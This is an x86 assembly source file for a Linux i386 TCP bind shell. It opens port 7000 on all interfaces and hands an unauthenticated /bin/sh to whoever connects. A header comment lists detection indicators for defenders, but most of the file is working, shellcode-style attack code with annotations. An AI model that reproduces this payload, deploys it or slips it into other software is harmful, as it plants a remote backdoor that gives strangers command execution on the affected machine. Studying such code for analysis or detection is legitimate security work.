BITS 32

;-----------------------------------------------------------------------
; Linux i386 TCP bind shell (NASM syntax, int 0x80 system-call interface).
;
; Behaviour, as read from the code below:
;   1. socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)
;   2. bind() to INADDR_ANY, TCP port 7000
;   3. listen() with a backlog of 1
;   4. accept() a single connection
;   5. dup2() the accepted descriptor onto fds 2, 1 and 0
;   6. execve("//bin/sh", NULL, NULL)
; Nothing in the code authenticates the peer: whoever connects to the
; port is handed the shell, running as the user of the hosting process.
;
; Register roles:
;   eax = system-call number in, return value out
;   ebx = socketcall() sub-call number (1, 2, 4, 5), later dup2 oldfd,
;         finally the execve filename pointer
;   ecx = pointer to the argument array on the stack, later dup2 newfd
;   edi = listening socket descriptor
;
; No return value is checked. Most steps write only AL and depend on
; the rest of EAX being zero after the preceding call.
;
; Indicators a defender can look for, all taken from this listing:
;   - a TCP listener on 0.0.0.0:7000;
;   - socketcall (0x66) issued with sub-calls 1, 2, 4, 5 in that order,
;     then dup2 (0x3f) three times and execve (0x0b);
;   - a shell whose stdin/stdout/stderr all refer to a network socket;
;   - the immediates 0x68732f6e / 0x69622f2f ("//bin/sh" on the stack)
;     and the word 0x581b next to an AF_INET family value.
;-----------------------------------------------------------------------

SECTION .text                           ; code section
global main                             ; make label available to linker

main:
        ; SOCKET {{{
        xor     eax, eax
        xor     ebx, ebx
        ; socket() args, pushed last-to-first {
        push    byte 6                  ; IPPROTO_TCP (=6)
        push    byte 1                  ; SOCK_STREAM (=1)
        push    byte 2                  ; PF_INET (=2)
        ; }
        mov     al, 0x66                ; socketcall()
        inc     ebx                     ; int call = 1 (socket)
        mov     ecx, esp                ; unsigned long *args = {2, 1, 6}
        int     0x80
        ; }}}

        mov     edi, eax                ; save sockfd; edi keeps it for bind/listen/accept

        ; BIND {{{
        inc     ebx                     ; int call = 2 (bind)
        ; struct sockaddr_in, built on the stack {
        cdq                             ; edx = 0 as long as eax (socket's return) is non-negative
        push    edx                     ; INADDR_ANY = htonl(0x0) = 0x0 -> all interfaces
        push    word 0x581b             ; port 7000 = htons(0x1b58) = 0x581b
        push    word bx                 ; AF_INET = 2 (bx is the call number, also 2)
        ; }
        ; Only these 8 bytes are built; the other 8 bytes covered by
        ; addrlen = 16 are the socket() argument words left above them.
        mov     ecx, esp                ; save pointer to struct
        ; bind() args {
        push    byte 16                 ; socklen_t addrlen
        push    ecx                     ; const struct sockaddr *my_addr
        push    edi                     ; int sockfd
        ; }
        mov     al, 0x66                ; socketcall(); eax still holds the small sockfd value
        mov     ecx, esp                ; unsigned long *args = {sockfd, &addr, 16}
        int     0x80
        ; }}}

        ; LISTEN {{{
        sal     bl, 1                   ; int call = 4 (2<<1) (listen)
        ; listen() args {
        push    byte 1                  ; int backlog
        push    edi                     ; int sockfd
        ; }
        mov     al, 0x66                ; socketcall()
        mov     ecx, esp                ; unsigned long *args = {sockfd, 1}
        int     0x80
        ; }}}

        ; ACCEPT {{{
        inc     ebx                     ; int call = 5 (accept)
        ; eax is expected to be 0 here (listen's success return);
        ; it supplies both NULL pointers below
        ; accept() args {
        push    eax                     ; socklen_t *addrlen = NULL
        push    eax                     ; struct sockaddr *addr = NULL (peer address not recorded)
        push    edi                     ; int sockfd
        ; }
        mov     al, 0x66                ; socketcall()
        mov     ecx, esp                ; unsigned long *args = {fd, 0, 0}
        int     0x80                    ; returns the connected descriptor in eax
        ; }}}

        ; DUP2 {{{
        ; Point fds 2, 1 and 0 at the accepted connection.
        xchg    ebx, eax                ; int oldfd = client; eax receives the old call number (5)
        xor     ecx, ecx
        mov     cl, 3                   ; i=3
l00p:
        dec     ecx                     ; --i (sets ZF when i reaches 0)
        mov     al, 0x3f                ; dup2(); mov leaves the flags from dec intact
        int     0x80                    ; dup2(oldfd, i)
        jnz     l00p                    ; tests dec's ZF; assumes int 0x80 returns with flags unchanged
        ; }}}

        ; EXECVE {{{
        ; ecx is already 0 (char *const argv [] = NULL)
        push    ecx                     ; string terminator
        push    0x68732f6e              ; hs/n  -> "n/sh" in memory
        push    0x69622f2f              ; ib//  -> "//bi" in memory
        mov     ebx, esp                ; const char *filename = esp ("//bin/sh")
        mov     al, 0x0b                ; execve()
        cdq                             ; char *const envp [] = NULL (edx = 0 while eax is non-negative)
        int     0x80
        ; }}}

        ; EXIT {{{
        ; Reached only if execve() returns. ebx still holds the filename
        ; pointer, so the exit status is not a deliberately chosen value.
        mov     al, 1                   ; exit()
        int     0x80
        ; }}}